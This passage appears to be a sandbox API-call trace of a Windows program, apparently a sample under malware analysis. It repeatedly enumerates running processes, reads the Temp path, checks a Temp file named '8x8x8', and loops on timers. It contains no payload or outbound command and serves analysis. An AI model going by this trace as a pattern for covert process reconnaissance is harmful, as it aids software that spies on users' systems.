pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0298.977] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0298.978] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.978] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.979] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.980] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.981] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0298.983] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.983] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.984] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0298.985] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0298.986] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0298.987] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0298.988] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0298.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0298.990] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0298.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0298.992] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0298.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0298.994] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0298.994] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0298.995] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0298.996] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0298.997] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0298.998] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0298.999] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0298.999] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0299.000] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0299.001] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0299.002] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0299.003] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0299.004] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0299.004] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0299.005] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.006] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0299.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0299.009] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0299.010] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0299.011] CloseHandle (hObject=0x294) returned 1 [0299.011] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0299.011] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0299.011] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0299.013] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.014] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0299.015] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0299.016] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0299.017] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0299.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0299.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0299.019] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0299.020] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0299.021] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0299.037] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0299.037] TranslateMessage (lpMsg=0x8bf970) returned 0 [0299.037] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0299.037] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0299.038] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0299.038] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0299.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0299.038] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0299.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0299.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0299.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0299.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0299.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0299.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0299.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0299.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0299.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0299.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0299.038] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0299.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0299.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0299.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0299.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0299.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0299.039] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0299.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0299.039] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0299.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0299.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0299.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0299.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0299.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0299.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0299.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0299.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0299.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0299.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0299.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0299.041] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0299.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0299.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0299.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0299.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0299.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0299.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0299.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0299.041] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0299.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0299.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0299.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0299.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0299.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0299.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0299.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0299.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0299.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0299.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0299.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0299.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0299.042] timeGetTime () returned 0x4ab99 [0299.042] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.042] Sleep (dwMilliseconds=0xa) [0299.053] timeGetTime () returned 0x4aba8 [0299.053] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.053] Sleep (dwMilliseconds=0xa) [0299.070] timeGetTime () returned 0x4abb8 [0299.070] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 